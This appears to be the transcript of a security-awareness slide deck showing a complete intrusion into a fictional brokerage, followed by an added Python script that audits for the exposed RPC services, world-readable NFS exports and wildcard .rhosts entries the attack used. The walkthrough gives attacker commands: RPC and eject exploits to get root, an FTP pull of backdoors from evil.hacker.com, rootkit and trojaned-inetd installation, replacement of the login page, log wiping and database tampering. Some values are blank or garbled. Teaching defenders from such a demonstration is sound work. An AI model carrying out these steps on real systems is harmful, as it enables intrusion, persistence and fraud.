Transcript:

Attack example

WHOIS Search

ACMETRADE.COM

Registrant: Acmetrade.com, Inc. (ACMETRADE-DOM)
6600 Peachtree Dunwoody Road
Atlanta, GA 30338
Domain Name: ACMETRADE.COM
Administrative Contact: Vaughn, Danon (ES2394) (678) (FAX) (678)
Technical Contact, Zone Contact: Bergman, Bret (ET2324) (678) (FAX) (678)
Billing Contact: Fields, Hope (ET3427) (678) (FAX) (678)
Record last updated on 27-Jul-99.
Record created on 06-Mar-98.
Database last updated on 4-Oct-99 09:09:01 EDT
Domain servers in listed order:
dns.acmetrade.com
www1.acmetrade.com
www2.acmetrade.com

hacker:/export/home/hacker> ./rpcscan dns.acmetrade.com cmsd
Scanning dns.acmetrade.com for program cmsd
is on port
hacker:/export/home/hacker>

hacker:/export/home/hacker> id
uid=1002(hacker) gid=10(staff)
hacker:/export/home/hacker> uname -a
SunOS evil.hacker.com 5.6 Generic_ sun4u sparc SUNW,UltraSPARC-IIi-Engine
hacker:/export/home/hacker> ./cmsd dns.acmetrade.com
using source port 53
rtable_create worked
Exploit successful. Portshell created on port
hacker:/export/home/hacker> telnet dns.acmetrade.com 33505
Trying
Connected to dns.acmetrade.com.
Escape character is '^]'.
# id
uid=0(root) gid=0(root)
# uname -a
SunOS dns Generic_ sun4m sparc SUNW,SPARCstation-5
#

# nslookup
Default Server: dns.acmetrade.com
Address:
> ls acmetrade.com
[dns.acmetrade.com]
 www1.acmetrade.com
 www2.acmetrade.com
 margin.acmetrade.com
 marketorder.acmetrade.com
 deriv.acmetrade.com
 deriv1.acmetrade.com
 bond.acmetrade.com
 ibd.acmetrade.com
 fideriv.acmetrade.com
 backoffice.acmetrade.com
 wiley.acmetrade.com
 bugs.acmetrade.com
 fw.acmetrade.com
 fw1.acmetrade.com
Received 15 records.
> ^D
#

# rpcinfo -p | grep mountd
  udp 643 mountd
  tcp 647 mountd
# showmount -e
export list for
/usr/local    server2, server3, server4
/export/home  sunspot
# rpcinfo -p www1.acmetrade.com | grep mountd
  udp 643 mountd
  tcp 647 mountd
# showmount -e www1.acmetrade.com
export list for www1.acmetrade.com:
/data1        server2
/aengineering
/bengineering
/cengineering
/export/home  (everyone)
#

nfs

nfsshell.c

# nfsshell
nfs> host www1.acmetrade.com
Open www1.acmetrade.com[ ] (mountd) using UDP/IP
nfs> export
Export list for www1.acmetrade.com:
/data1        server2
/aengineering
/bengineering
/cengineering
/export/home  (everyone)
nfs> mount /export/home
Mount www1.acmetrade.com[ ]:/export/home
- protocol: UDP/IP
- transfer size: 8192 bytes
nfs> ls
bill bob celeste chuck dan dave jenn zack
nfs> ls -l bob
drwxr-xr-x May bob
nfs> cd bob
nfs> uid 201
nfs> gid 1

nfs> status
User id      : 201
Group id     : 1
Remote host  : www1.acmetrade.com
Mount path   : /export/home
Transfer size: 8192
nfs> !sh
$ echo "+ +" > .rhosts
$ exit
nfs> put .rhosts
nfs> cat .rhosts
+
nfs> exit
# rlogin -l bob www1.acmetrade.com
Last login: Wed Mar 3 10:46:52 from somebox.internal.acmetrade.com
www1% whoami
bob
www1% pwd
/export/home/bob
www1% uname -a
SunOS www1.acmetrade.com Generic_ sun4d SUNW,SPARCserver-1000
www1% cat .rhosts
+

www1% ls -la /usr/bin/eject
-r-sr-xr-x 1 root bin Jul /usr/bin/eject*
www1% gcc -o eject_overflow eject_overflow.c
www1% ./eject_overflow
Jumping to address 0xeffff630 B[364] E[400] SO[400]
# whoami
root
# ftp evil.hacker.com
Connected to evil.hacker.com.
220 evil.hacker.com FTP server (HackerOS) ready.
Name (evil.hacker.com:root): hacker
331 Password required for hacker.
Password: eye0wnu
230 User hacker logged in.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> cd solaris_backdoors
250 CWD command successful.
ftp> get solaris_backdoor.tar.gz
200 PORT command successful.
150 Binary data connection for out ,1152).
226 Transfer complete
bytes sent in secs (4.7Kbytes/sec)
ftp> quit
# cd /tmp/my_tools
# gunzip module_backdoor.tar.gz
# tar -xf module_backdoor.tar
#

# cd /tmp/my_tools/module_backdoor
# ./configure
Enter directories and filenames to hide from ls, find, du:
Enter class C network to hide from netstat:
Enter process names to hide from ps and lsof: backdoor sniffer
creating config.h
# make
gcc -c backdoor.c
ld -o backdoor -r backdoor.o
gcc -o installer installer.c
# ls
Makefile backdoor backdoor.c backdoor.o config.h configure installer installer.c
# modload backdoor
# ./installer -d /usr/local/share/...
Adding directory...
Fixing last modified time...
Fixing last accessed time...

# ls -la /usr/local/share/...
/usr/local/share/...: No such file or directory
# ./installer backdoor /usr/local/share/.../backdoor
Installing file...
Fixing last modified time...
Fixing last accessed time...
# echo "/usr/sbin/modload /usr/local/share/.../backdoor" >> /etc/init.d/utmpd
# cd ..
# rm -rf module_backdoor
# ls
inetd_backdoor/ logedit sniffer
# ./installer sniffer /usr/local/share/.../sniffer
Installing file...
Fixing last modified time...
Fixing last accessed time...
# ls /usr/local/share/.../sniffer
/usr/local/share/.../sniffer: No such file or directory
# cd /usr/local/share/...
# ./sniffer > out &
# ps -aef | grep sniffer
#

# netstat
TCP
   Local Address   Remote Address   Swind Send-Q Rwind Recv-Q  State
                                                               ESTABLISHED
                                                               ESTABLISHED
                                                               ESTABLISHED
# cd /tmp/my_tools
# cd inetd_backdoor
# ls
config.h configure inetd.c installer.c
# ./configure
Enter port for hidden shell:
creating config.h...
creating Makefile
# make
gcc -s -DSYSV=4 -D__svr4__ -DSOLARIS -o inetd inetd.c -lnsl -lsocket -lresolv
gcc -o installer installer.c
# installer inetd /usr/sbin/inetd
Installing file...
Fixing last modified time...
Fixing last accessed time...

# ps -aef | grep inetd
root May 10 ? 1:26 /usr/sbin/inetd -s
# kill -9 179
# /usr/sbin/inetd -s &
# exit
Connection closed by foreign host.
hacker:/export/home/hacker> telnet www1.acmetrade.com
Trying
Escape character is '^]'.
Granting rootshell...
# hostname
www1
# whoami
root
#

ftp www1.acmetrade.com
Connected to www1
220 www1.acmetrade.com FTP service (Version 2.5).
Name: root
331 Password required for root.
Password: *******
230 User root logged in.
Remote system type is Unix.
ftp> cd /usr/local/httpd
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 10
-rwxr-xr-x 9 root other 1024 Aug 17 17:07 .
-rwxr-xr-x 9 root other 1024 Aug 17 17:07 ..
-rwxr-xr-x 2 www  www  2034 Aug 17 17:07 index.html
-rwxr-xr-x 2 www  www  1244 Aug 17 17:07 securelogin.html
-rwxr-xr-x 2 www  www  1024 Aug 17 17:07 image2.gif
-rwxr-x--x 6 www  www   877 Aug 17 17:07 title.gif
-rwxr-xr-x 2 www  www  1314 Aug 17 17:07 frontpage.jpg
226 Transfer complete.
bytes received in 0.82 seconds (0.76 Kbytes/sec)
ftp> put backdoor.html securelogin.html
200 PORT command successful.
150 Opening BINARY mode data connection for index.html
226 Transfer complete.
ftp> quit

# rpcinfo -p backoffice.acmetrade.com
   program vers proto   port  service
                 tcp    111  rpcbind
                 tcp    111  rpcbind
                 tcp    111  rpcbind
                 udp    111  rpcbind
                 udp    111  rpcbind
                 udp    111  rpcbind
                 udp    753  ypserv
                 udp    753  ypserv
                 tcp    754  ypserv
                 tcp         ypserv
                 udp
                 udp         ypbind
                 udp         ypbind
                 udp         ypbind
                 tcp         ypbind
                 tcp         ypbind
                 tcp         ypbind
                 udp         rquotad
                 udp
                 udp
                 udp
                 udp
                 udp
                 udp         status
                 tcp         status
                 udp   4045  nlockmgr
                 udp   4045  nlockmgr
                 udp   4045  nlockmgr
                 udp   4045  nlockmgr
                 tcp   4045  nlockmgr
                 tcp   4045  nlockmgr
                 tcp   4045  nlockmgr
                 tcp   4045  nlockmgr
                 udp         mountd
                 udp         mountd
                 udp         mountd
                 tcp         mountd
                 tcp         mountd
                 tcp         mountd
                 tcp
                 udp   2049  nfs
                 udp   2049  nfs
                 udp   2049  nfs
                 udp   2049  nfs_acl
                 udp   2049  nfs_acl
                 tcp   2049  nfs
                 tcp   2049  nfs
                 tcp   2049  nfs_acl
                 tcp   2049  nfs_acl
# rpcinfo -p backoffice.acmetrade.com | grep tcp
# grep ttdbserverd /etc/inetd.conf
/1 tli rpc/tcp wait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd
# cd /tmp/mytools/warez

# ./tt backoffice.acmetrade.com
Please wait for your root shell.
# hostname
backoffice
# whoami
root
# find / -type f -name .rhosts -print
/.rhosts
/export/home/chuck/.rhosts
/export/home/bill/.rhosts
/export/home/larry/.rhosts
# cat /.rhosts
fideriv.acmetrade root
ibd.acmetrade root
bugs.acmetrade root
# w
10:20pm up 13:15, 1 user, load average: 0.01, 0.02, 0.03
User     tty      idle    JCPU   PCPU  what
root     console  9:27am  147:52 14:41 14:14 /sbin/sh
root     pts/5    9:24pm               /sbin/sh
# /tmp/mytools/logedit root pts/5
# w
10:20pm up 13:15, 1 user, load average: 0.01, 0.02, 0.03
User     tty      idle    JCPU   PCPU  what
root     console  9:27am  147:52 14:41 14:14 /sbin/sh
#
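The intrusion above chained three exposures that an administrator can find before an attacker does: RPC services registered with the portmapper (cmsd on the DNS server, ttdbserverd and mountd/nfs on backoffice), an NFS home directory exported to (everyone), and a wildcard "+ +" entry in .rhosts. The following Python audit script is an added example, not part of the original slides or of the presenter's tools; it parses `rpcinfo -p` and `showmount -e` output of the kind shown in the transcript plus a .rhosts file and reports those three conditions. The sample listings at the bottom are constructed to mirror the transcript (the well-known ONC RPC program numbers are real, the high ports are made up, the host names are the slide's own).

```python
"""Audit helpers for the exposures chained in the walkthrough.

Added example, not part of the original slides or the presenter's tools.
The sample listings below are constructed to mirror the transcript.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# RPC services the walkthrough abused (cmsd, ttdbserverd, mountd/nfs) plus the
# NIS/NFS helpers that should never be reachable from untrusted networks.
RISKY_RPC = {"cmsd", "ttdbserverd", "mountd", "nfs", "nfs_acl",
             "ypserv", "ypbind", "rquotad", "status", "nlockmgr"}


@dataclass(frozen=True)
class RpcEntry:
    proto: str
    port: Optional[int]
    service: Optional[str]


def parse_rpcinfo(text: str) -> list[RpcEntry]:
    """Parse `rpcinfo -p` output. Keys on the tcp/udp token, so rows whose
    program/version/port columns are missing (as in the garbled slide) still parse."""
    entries: list[RpcEntry] = []
    for line in text.splitlines():
        toks = line.split()
        if not toks or toks[0] == "program":
            continue
        idx = next((i for i, t in enumerate(toks) if t in ("tcp", "udp")), None)
        if idx is None:
            continue
        nxt = toks[idx + 1] if idx + 1 < len(toks) else ""
        port = int(nxt) if nxt.isdigit() else None
        last = toks[-1]
        service = last if idx != len(toks) - 1 and not last.isdigit() else None
        entries.append(RpcEntry(toks[idx], port, service))
    return entries


def risky_rpc_services(entries: list[RpcEntry]) -> list[str]:
    """Registered services that fall in RISKY_RPC, sorted and deduplicated."""
    return sorted({e.service for e in entries if e.service in RISKY_RPC})


def parse_showmount(text: str) -> list[tuple[str, list[str]]]:
    """Parse `showmount -e` output into (path, clients). Also accepts the
    slide's '/export/home(everyone)' form with no space before the client list."""
    exports: list[tuple[str, list[str]]] = []
    for line in text.splitlines():
        m = re.match(r"^\s*(/[^\s(]*)\s*(.*)$", line)
        if not m:
            continue  # header line ("export list for ...") or blank line
        clients = [c for c in m.group(2).replace(",", " ").split() if c]
        exports.append((m.group(1), clients))
    return exports


def world_exports(exports: list[tuple[str, list[str]]]) -> list[str]:
    """Paths exported to every host ('(everyone)' or '*')."""
    return [path for path, clients in exports
            if any(c.strip("()").lower() == "everyone" or c == "*" for c in clients)]


def rhosts_wildcard_lines(content: str) -> list[str]:
    """Lines of a .rhosts or hosts.equiv file whose host or user field is '+'."""
    bad = []
    for line in content.splitlines():
        toks = line.split()
        if not toks or toks[0].startswith("#"):
            continue
        if "+" in toks[:2]:
            bad.append(line.strip())
    return bad


def audit_host(rpcinfo_text: str, showmount_text: str, rhosts_text: str) -> dict[str, list[str]]:
    """Run the three checks for one host and return the findings by category."""
    return {
        "risky_rpc": risky_rpc_services(parse_rpcinfo(rpcinfo_text)),
        "open_exports": world_exports(parse_showmount(showmount_text)),
        "rhosts_wildcards": rhosts_wildcard_lines(rhosts_text),
    }


# Constructed sample input mirroring the transcript (program numbers are the
# well-known ONC RPC assignments; the 327xx ports are made up).
SAMPLE_RPCINFO = """\
   program vers proto   port  service
    100000    4   tcp    111  rpcbind
    100000    4   udp    111  rpcbind
    100068    5   udp  32772  cmsd
    100083    1   tcp  32773  ttdbserverd
    100005    1   udp    643  mountd
    100005    1   tcp    647  mountd
    100003    2   udp   2049  nfs
"""
SAMPLE_SHOWMOUNT = """\
export list for www1.acmetrade.com:
/data1        server2
/aengineering server2,server3
/export/home(everyone)
"""
SAMPLE_RHOSTS = "+ +\nsomebox.internal.acmetrade.com bob\n"

if __name__ == "__main__":
    for key, hits in audit_host(SAMPLE_RPCINFO, SAMPLE_SHOWMOUNT, SAMPLE_RHOSTS).items():
        print(f"{key}: {hits}")
```

Run against real output captured on a host, `audit_host` returns the same three lists; each non-empty list is something the walkthrough exploited, and the fix is the usual one for each (filter or disable the RPC service, export home directories to named hosts only, and remove wildcard trust from .rhosts).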

# sqlplus oracle/oracle
SQL> describe customers
Name          Null?     Type
LNAME         NOT NULL  VARCHAR2(20)
FNAME         NOT NULL  VARCHAR2(15)
ADDR1         NOT NULL  VARCHAR2(30)
ZIP           NOT NULL  NUMBER(5)
PHONE         NOT NULL  CHAR(12)
ACCOUNT_NUM   NOT NULL  NUMBER(12)
BALANCE       NOT NULL  NUMBER(12)
MARGIN_LIMIT  NOT NULL  NUMBER(12)
ACCT_OPEN     NOT NULL  DATE
SQL> select LNAME, FNAME, ACCOUNT_NUM, MARGIN_LIMIT from customers where LNAME = 'Gerulski';
LNAME     FNAME   ACCOUNT_NUM  MARGIN_LIMIT
Gerulski  David
SQL> update customers set MARGIN_LIMIT = where LNAME = 'Gerulski';
SQL> select LNAME, MARGIN_LIMIT from customers where LNAME = 'Gerulski';
LNAME     MARGIN_LIMIT
Gerulski
SQL> exit

Anatomy of the Attack
[Network diagram of AcmeTrade's network: Filtering Router, Firewall, DNS Server (UNIX), Web Server (UNIX), internal Network (UNIX and NT), NT Clients & Workstations; the attack steps are annotated as rpc.cmsd, nfs / eject, tooltalk, /oracle]

What is Vulnerable?
[Each slide repeats the network diagram (Router, Firewall, Server, Web Server, Servers, Clients & Workstations, Network) and highlights one layer:]
IT Infrastructure: Router, Firewall, Server, Web Server, Servers, Clients & Workstations, Network
Applications: E-Commerce Web Server, SAP, Peoplesoft, Web Browsers
Databases: Oracle, Microsoft SQL Server, Sybase
Operating Systems: AIX, Solaris, HP-UX, Windows NT, Windows 95 & NT, Network Operating Systems
Networks: TCP/IP, Netware